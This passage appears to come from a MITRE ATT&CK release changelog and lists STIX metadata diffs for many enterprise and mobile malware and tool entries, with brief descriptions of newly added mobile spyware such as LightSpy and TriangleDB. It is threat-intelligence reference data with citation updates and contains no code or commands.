modified | 2020-05-12 20:56:07.174000+00:00 | 2025-04-16 20:38:21.823000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0476] Valak
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-24 21:42:31.959000+00:00 | 2025-04-16 20:38:30.200000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0636] VaporRage
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-04 15:46:36.800000+00:00 | 2025-04-16 20:38:24.732000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0207] Vasport
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-06 19:32:28.278000+00:00 | 2024-11-17 19:55:07.593000+00:00 |
external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0155] WINDSHIELD
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:25.359000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0219] WINERACK
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-04 21:37:24.766000+00:00 | 2024-11-17 15:01:33.388000+00:00 |
external_references[1]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0366] WannaCry
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-08 22:20:20.868000+00:00 | 2024-12-09 02:29:13.859000+00:00 |
external_references[8]['description'] | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved December 8, 2024. |
external_references[8]['url'] | https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ | https://web.archive.org/web/20230522041200/https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0515] WellMail
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-09 15:38:41.755000+00:00 | 2025-04-16 20:38:24.228000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0514] WellMess
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-03-22 18:45:19.504000+00:00 | 2025-04-16 20:38:02.903000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0206] Wiarp
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-06 19:32:28.378000+00:00 | 2024-11-17 19:55:07.588000+00:00 |
external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0059] WinMM
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:27:57.226000+00:00 | 2025-04-16 20:37:58.498000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0466] WindTail
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-10 20:39:43.747000+00:00 | 2024-11-17 14:15:51.851000+00:00 |
external_references[1]['description'] | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020. | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf | https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868 |
[S0176] Wingbird
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:29:08.243000+00:00 | 2025-04-16 20:38:29.211000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0041] Wiper
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:28.028000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0161] XAgentOSX
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:30:21.733000+00:00 | 2025-04-16 20:38:10.547000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0117] XTunnel
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-21 00:40:57.275000+00:00 | 2025-04-16 20:38:17.007000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0341] Xbash
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-23 20:41:28.496000+00:00 | 2025-04-16 20:38:15.191000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0086] ZLib
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-30 20:52:00.462000+00:00 | 2025-04-16 20:37:56.750000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0251] Zebrocy
Current version: 3.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-23 19:45:36.003000+00:00 | 2025-04-16 20:38:28.500000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0027] Zeroaccess
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:08.895000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0412] ZxShell
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-23 15:27:10.501000+00:00 | 2025-04-16 20:38:36.169000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0202] adbupd
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:33:31.623000+00:00 | 2025-04-16 20:37:56.265000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0110] at
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-22 20:56:56.049000+00:00 | 2025-04-16 20:38:49.779000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0471] build_downer
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-24 17:50:33.499000+00:00 | 2025-04-16 20:38:36.962000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1043] ccf32
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-10 19:47:44.529000+00:00 | 2025-04-16 20:38:28.343000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0106] cmd
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-13 20:24:11.194000+00:00 | 2025-04-16 20:38:55.702000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0472] down_new
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-24 01:27:32.659000+00:00 | 2025-04-16 20:38:21.345000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0105] dsquery
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-01-04 18:56:27.812000+00:00 | 2025-04-16 20:38:51.407000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0008] gsecdump
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-22 20:55:32.937000+00:00 | 2024-11-17 23:49:27.288000+00:00 |
external_references[1]['description'] | TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015. | TrueSec. (n.d.). gsecdump v2.0b5. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 | https://web.archive.org/web/20140328102838/https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0071] hcdLoader
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:36:37.734000+00:00 | 2025-04-16 20:38:26.900000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0068] httpclient
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:37:13.552000+00:00 | 2025-04-16 20:38:40.829000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0278] iKitten
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:37:55.343000+00:00 | 2025-04-16 20:38:00.655000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0101] ifconfig
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:51.252000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0100] ipconfig
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-12 21:28:49.335000+00:00 | 2025-04-16 20:38:50.417000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1048] macOS.OSAMiner
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-19 21:01:46.587000+00:00 | 2025-04-16 20:37:59.825000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0175] meek
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 23:00:38.683000+00:00 | 2025-04-16 20:38:52.775000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0102] nbtstat
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:55.076000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0385] njRAT
Current version: 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 00:33:37.539000+00:00 | 2024-11-17 16:13:48.723000+00:00 |
external_references[3]['description'] | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019. | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html | https://web.archive.org/web/20200302085808/https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html |
[S0067] pngdowner
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:39:05.662000+00:00 | 2025-04-16 20:38:20.185000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0006] pwdump
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-08-13 20:12:50.895000+00:00 | 2025-04-16 20:38:54.480000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0103] route
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-06 15:27:00.668000+00:00 | 2025-04-16 20:38:55.853000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0111] schtasks
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 20:04:22.896000+00:00 | 2025-04-16 20:38:56.004000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0227] spwebmember
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-03-29 19:54:46.007000+00:00 | 2025-04-16 20:38:51.100000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0225] sqlmap
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:54.328000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0653] xCaon
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 02:20:16.562000+00:00 | 2025-04-16 20:37:58.030000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0123] xCmd
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:51.879000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0248] yty
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-28 21:45:32.149000+00:00 | 2025-04-16 20:37:53.646000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0350] zwShell
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-22 00:38:34.857000+00:00 | 2025-04-16 20:38:08.735000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
mobile-attack
New Software
[S1214] Android/SpyAgent
Current version: 1.0
Description:
Android/SpyAgent is a variant of spyware in the MoqHao phishing campaign primarily targeting Korean and Japanese users.(Citation: McAfee MoqHao 2019) Fake security applications were used to target Japanese users, while fake police applications were used to target Korean users. Both fake applications have common C2 commands and share the same crash report key on a cloud service.(Citation: McAfee MoqHao 2019)
[S1215] Binary Validator
Current version: 1.0
Description:
Binary Validator is a Mach-O binary file used during Operation Triangulation.(Citation: SecureList OpTriangulation 23Oct2023) Binary Validator first collects information about the device, such as the device's phone number and a list of installed applications, before the deployment of the TriangleDB implant. After the actions are completed and the data is collected, Binary Validator encrypts and sends the data to the C2 server, and in turn, the C2 server sends the TriangleDB implant.
[S1208] FjordPhantom
Current version: 1.0
Description:
FjordPhantom is a malicious Android application first discovered in September 2024 with targets in Southeast Asia, specifically Indonesia, Thailand, and Vietnam. FjordPhantom was distributed through email and messaging applications. Once installed, the application launches a virtualization solution to steal important information, such as bank accounts, and to manipulate the user interface. The malicious activity from the virtualization solution runs alongside legitimate banking applications.(Citation: Promon FjordPhantom Oct2024)
[S1185] LightSpy
Current version: 1.0
Description:
First observed in 2018, LightSpy is a modular malware family that initially targeted iOS devices in Southern Asia before expanding to Android and macOS platforms. It consists of a downloader, a main executable that manages network communications, and functionality-specific modules, typically implemented as .dylib files (iOS, macOS) or .apk files (Android). LightSpy can collect VoIP call recordings, SMS messages, and credential stores, which are then exfiltrated to a command and control (C2) server.(Citation: MelikovBlackBerry LightSpy 2024)
[S1195] SpyC23
Current version: 1.0
Description:
SpyC23 is a mobile malware that has been used by APT-C-23 since at least 2017. SpyC23 has been observed primarily targeting Android devices in the Middle East.(Citation: welivesecurity_apt-c-23)
There are multiple close variants of SpyC23, such as VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2017), Desert Scorpion and FrozenCell, which add some additional functionality but are not significantly different from the original malware.
[S1216] TriangleDB
Current version: 1.0
Description:
TriangleDB is an implant written in Objective-C that is deployed after Binary Validator, once root privileges have been obtained during Operation Triangulation’s infection chain. Upon execution, TriangleDB communicates with the C2 server, relaying information about the victim device.(Citation: SecureList OpTriangulation 21Jun2023)
Minor Version Changes
[S0505] Desert Scorpion
Current version: 1.2
Version changed from: 1.1 → 1.2
t | [Desert Scorpion](https://attack.mitre.org/software/S0505) i | t | [Desert Scorpion](https://attack.mitre.org/software/S0505) i |
| s surveillanceware that has targeted the Middle East, specif | | s surveillanceware that has targeted the Middle East, specif |
| ically individuals located in Palestine. [Desert Scorpion](h | | ically individuals located in Palestine. [Desert Scorpion](h |
| ttps://attack.mitre.org/software/S0505) is suspected to have | | ttps://attack.mitre.org/software/S0505) is suspected to have |
| been operated by the threat actor APT-C-23.(Citation: Looko | | been operated by the threat actor [APT-C-23](https://attack |
| ut Desert Scorpion) | | .mitre.org/groups/G1028).(Citation: Lookout Desert Scorpion) |
| | | There are multiple close variants of [Desert Scorpion](ht |
| | | tps://attack.mitre.org/software/S0505), such as VAMP(Citatio |
| | | n: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2 |
| | | 017), [FrozenCell](https://attack.mitre.org/software/S0577) |
| | | and [SpyC23](https://attack.mitre.org/software/S1195), which |
| | | add some additional functionality but are not significantly |
| | | different from the original malware. |
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-19 17:11:50.159000+00:00 | 2025-01-13 17:52:20.612000+00:00 |
description | [Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion) | [Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor [APT-C-23](https://attack.mitre.org/groups/G1028).(Citation: Lookout Desert Scorpion)
There are multiple close variants of [Desert Scorpion](https://attack.mitre.org/software/S0505), such as VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2017), [FrozenCell](https://attack.mitre.org/software/S0577) and [SpyC23](https://attack.mitre.org/software/S1195), which add some additional functionality but are not significantly different from the original malware. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Unit42 VAMP 2017', 'description': 'Bar, T., Lancaster, T. (2017, April 5). Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA. Retrieved March 4, 2024.', 'url': 'https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/'} |
external_references | | {'source_name': 'Trendmicro GnatSpy 2017', 'description': 'Guo, G., Xu, E. (2017, December 18). New GnatSpy Mobile Malware Family Discovered. Retrieved March 4, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html'} |
[S1067] FluBot
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-31 23:02:48.577000+00:00 | 2025-03-27 22:35:44.281000+00:00 |
description | [FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524) | [FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524) An international law enforcement operation of 11 countries eventually disrupted the spread of [FluBot](https://attack.mitre.org/software/S1067).(Citation: Europol FluBot Jun2022) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Europol FluBot Jun2022', 'description': 'Europol. (2022, June 1). Takedown of SMS-based FluBot spyware infecting Android phones. Retrieved April 18, 2024.', 'url': 'https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones'} |
[S0577] FrozenCell
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-19 14:07:24.519000+00:00 | 2025-02-19 17:08:24.276000+00:00 |
description | [FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell) | [FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)
There are multiple close variants of [FrozenCell](https://attack.mitre.org/software/S0577), such as VAMP(Citation: Unit42 VAMP 2017), GnatSpy(Citation: Trendmicro GnatSpy 2017), [Desert Scorpion](https://attack.mitre.org/software/S0505) and [SpyC23](https://attack.mitre.org/software/S1195), which add some additional functionality but are not significantly different from the original malware. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Unit42 VAMP 2017', 'description': 'Bar, T., Lancaster, T. (2017, April 5). Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA. Retrieved March 4, 2024.', 'url': 'https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/'} |
external_references | | {'source_name': 'Trendmicro GnatSpy 2017', 'description': 'Guo, G., Xu, E. (2017, December 18). New GnatSpy Mobile Malware Family Discovered. Retrieved March 4, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html'} |
Patches
[S0310] ANDROIDOS_ANSERVER.A
Current version: 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:08.276000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1061] AbstractEmu
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-13 22:33:55.061000+00:00 | 2025-04-16 21:22:06.208000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0309] Adups
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:15.993000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0440] Agent Smith
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-17 12:49:21.423000+00:00 | 2025-04-16 21:22:11.884000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1095] AhRat
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-16 15:46:27.358000+00:00 | 2025-01-24 17:12:44.782000+00:00 |
description | [AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, “iRecorder – Screen Recorder”, which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523) | [AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, “iRecorder – Screen Recorder,” which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523) |
[S0319] Allwinner
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:03.823000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0292] AndroRAT
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-16 21:01:50.792000+00:00 | 2024-11-17 20:00:53.685000+00:00 |
external_references[3]['description'] | The404Hacking. (n.d.). AndroRAT. Retrieved April 8, 2024. | The404Hacking. (n.d.). AndroRAT. Retrieved November 17, 2024. |
external_references[3]['url'] | https://web.archive.org/web/20221013124327/https://github.com/The404Hacking/AndroRAT | https://web.archive.org/web/20221013124327/https:/github.com/The404Hacking/AndroRAT |
[S0525] Android/AdDisplay.Ashas
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-10-29 19:19:08.848000+00:00 | 2025-04-16 21:22:16.304000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0304] Android/Chuli.A
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.103000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0524] AndroidOS/MalLocker.B
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-10-29 18:41:49.272000+00:00 | 2025-04-16 21:22:11.027000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0540] Asacub
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-12-16 20:21:43.239000+00:00 | 2025-04-16 21:22:12.041000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0293] BrainTest
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-04-15 15:36:43.770000+00:00 | 2025-04-16 21:22:15.215000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0432] Bread
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-21 18:53:30.817000+00:00 | 2025-04-16 21:22:04.130000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0655] BusyGasper
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-28 17:20:20.194000+00:00 | 2025-04-16 21:22:15.058000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0555] CHEMISTGAMES
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-25 16:42:05.526000+00:00 | 2025-04-16 21:22:11.340000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0529] CarbonSteal
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-09-20 13:54:19.819000+00:00 | 2025-04-16 21:22:03.013000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0480] Cerberus
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-11 15:43:49.079000+00:00 | 2025-04-16 21:22:03.157000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1083] Chameleon
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-26 13:30:33.039000+00:00 | 2025-04-16 21:22:06.355000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0323] Charger
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.258000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0602] Circles
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-26 15:33:55.798000+00:00 | 2025-04-16 21:22:13.137000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0426] Concipit1248
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-04-30 18:30:05.787000+00:00 | 2025-04-16 21:22:10.526000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0425] Corona Updates
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
